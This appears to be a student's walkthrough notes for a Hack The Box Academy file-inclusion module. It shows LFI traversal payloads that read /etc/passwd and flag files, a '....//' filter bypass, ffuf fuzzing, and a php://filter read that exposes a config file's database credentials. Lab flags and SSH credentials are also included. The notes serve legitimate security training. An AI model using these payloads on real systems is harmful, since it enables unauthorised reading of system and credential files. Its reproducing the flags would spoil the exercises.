FILE INCLUSION

LFI

Using the file inclusion find the name of a user on the system that starts with "b".
root@oco:~$ BROWSER > {targetSite:port}
 Language: {english | spanish}
 
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=es.php

#try to discover whether LFI vulnerability exist
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=/etc/passwd
 * if method 1 doesn't work, apply method 2

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=../../../../etc/passwd
 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false systemd-timesync:x:102:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:103:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:104:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:105:107::/nonexistent:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologin barry:x:1000:1000::/home/barry:/bin/sh 
 
 * if method 2 had not worked, apply method 3
Submit the contents of the flag.txt file located in the /usr/share/flags directory.
root@oco:~$ BROWSER > {targetSite:port}
 Language: {english | spanish}
 
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=es.php

#try to discover whether LFI vulnerability exist
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=/etc/passwd
 * if method 1 doesn't work, apply method 2

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=../../../../../usr/share/flags/flag.txt
 HTB{n3v3r_tru$t_u$3r_!nput} 
 
 * if method 2 had not worked, apply method 3

BASIC BYPASSES

The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
root@oco:~$ BROWSER > {targetSite:port}
 Language: {english | spanish}
 
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/es.php

#try to discover whether LFI vulnerability exist
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/etc/passwd
 * this is method 1 discovery
 
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/../../../../etc/passwd
 * this is method 2 discovery
 
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/../../../../etc/passwd
 * method 3 discovery using the prepended /
 
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/....//....//....//....//etc/passwd
 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false systemd-timesync:x:102:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:103:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:104:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:105:107::/nonexistent:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologin 
 
 * this technique combines an approved path with non-recursive filter technique
    - approved path and character URL encoding could also have been used
    
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/....//....//....//....//flag.txt
 * HTB{64$!c_f!lt3r$_w0nt_$t0p_lf!}

PHP FILTERS

Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer
root@htb:~$ locate directory-list-2.3-small.txt
root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .

#fuzz for php  files
root@htb:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.50.242:54236/FUZZ.php -ic
 index                   [Status: 200, Size: 2652, Words: 690, Lines: 64, Duration: 73ms]
 en                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms]
 es                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms]
 configure               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 75ms]

 * the -ic flag ignores wordlist comments

 * do not limit the scanning to only HTTP 200 response codes. include all codes such as
   `301`, `302` and `403` as the source can be read from those pages and may contain
   valuable information

#use basic PHP filters to read PHP source code
root@htb:~$ BROWSER > http://94.237.50.242:54236/index.php?language=php://filter/read=convert.base64-encode/resource=configure
 <h2>Containers</h2> PD9waHAKCmlmICgkX1NFUlZFUlsnUkVRVUVTVF9NRVRIT0QnXSA9PSAnR0VUJyAmJiByZWFscGF0aChfX0ZJTEVfXykgPT0gcmVhbHBhdGgoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddKSkgewogIGhlYWRlcignSFRUUC8xLjAgNDAzIEZvcmJpZGRlbicsIFRSVUUsIDQwMyk7CiAgZGllKGhlYWRlcignbG9jYXRpb246IC9pbmRleC5waHAnKSk7Cn0KCiRjb25maWcgPSBhcnJheSgKICAnREJfSE9TVCcgPT4gJ2RiLmlubGFuZWZyZWlnaHQubG9jYWwnLAogICdEQl9VU0VSTkFNRScgPT4gJ3Jvb3QnLAogICdEQl9QQVNTV09SRCcgPT4gJ0hUQntuM3Yzcl8kdDByM19wbDQhbnQzeHRfY3IzZCR9JywKICAnREJfREFUQUJBU0UnID0+ICdibG9nZGInCik7CgokQVBJX0tFWSA9ICJBd2V3MjQyR0RzaHJmNDYrMzUvayI7
  
 * ALT: curl -v http://94.237.50.242:54236/index.php?language=php://filter/read=convert.base64-encode/resource=configure
    - view the page source to ensure the entire encoded string is copied, else it won't fully decode

root@htb:~$ echo -n 'PD9waHAKCmlmICgkX1NFUlZFUlsnUkVRVUVTVF9NRVRIT0QnXSA9PSAnR0VUJyAmJiByZWFscGF0aChfX0ZJTEVfXykgPT0gcmVhbHBhdGgoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddKSkgewogIGhlYWRlcignSFRUUC8xLjAgNDAzIEZvcmJpZGRlbicsIFRSVUUsIDQwMyk7CiAgZGllKGhlYWRlcignbG9jYXRpb246IC9pbmRleC5waHAnKSk7Cn0KCiRjb25maWcgPSBhcnJheSgKICAnREJfSE9TVCcgPT4gJ2RiLmlubGFuZWZyZWlnaHQubG9jYWwnLAogICdEQl9VU0VSTkFNRScgPT4gJ3Jvb3QnLAogICdEQl9QQVNTV09SRCcgPT4gJ0hUQntuM3Yzcl8kdDByM19wbDQhbnQzeHRfY3IzZCR9JywKICAnREJfREFUQUJBU0UnID0+ICdibG9nZGInCik7CgokQVBJX0tFWSA9ICJBd2V3MjQyR0RzaHJmNDYrMzUvayI7' | base64 -d
 <?php

   if ($_SERVER['REQUEST_METHOD'] == 'GET' && realpath(__FILE__) == realpath($_SERVER['SCRIPT_FILENAME'])) {
     header('HTTP/1.0 403 Forbidden', TRUE, 403);
     die(header('location: /index.php'));
   }

   $config = array(
     'DB_HOST' => 'db.inlanefreight.local',
     'DB_USERNAME' => 'root',
     'DB_PASSWORD' => 'HTB{n3v3r_$t0r3_pl4!nt3xt_cr3d$}',
     'DB_DATABASE' => 'blogdb'
   );

   $API_KEY = "Awew242GDshrf46+35/k";

PHP WRAPPERS

Try to gain RCE using one of the PHP wrappers and read the flag at /

REMOTE FILE INCLUSION (RFI)

Attack the target, gain command execution by exploiting the RFI vulnerability, and then look for the flag under one of the directories in /

LFI AND FILE UPLOADS

Use any of the techniques covered in this section to gain RCE and read the flag at /

LOG POISONING

Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd
Try to use a different technique to gain RCE and read the flag at /

AUTOMATED SCANNING

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

FILE INCLUSION PREVENTION

SSH to 10.129.29.112 (ACADEMY-LFI-HARDEN) with user "htb-student" and password "HTB_@cademy_stdnt!". What is the full path to the php.ini file for Apache?
SSH to 10.129.29.112 (ACADEMY-LFI-HARDEN) with user "htb-student" and password "HTB_@cademy_stdnt!". Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons.
PreviousWEB ATTACKSNextSESSION SECURITY

Last updated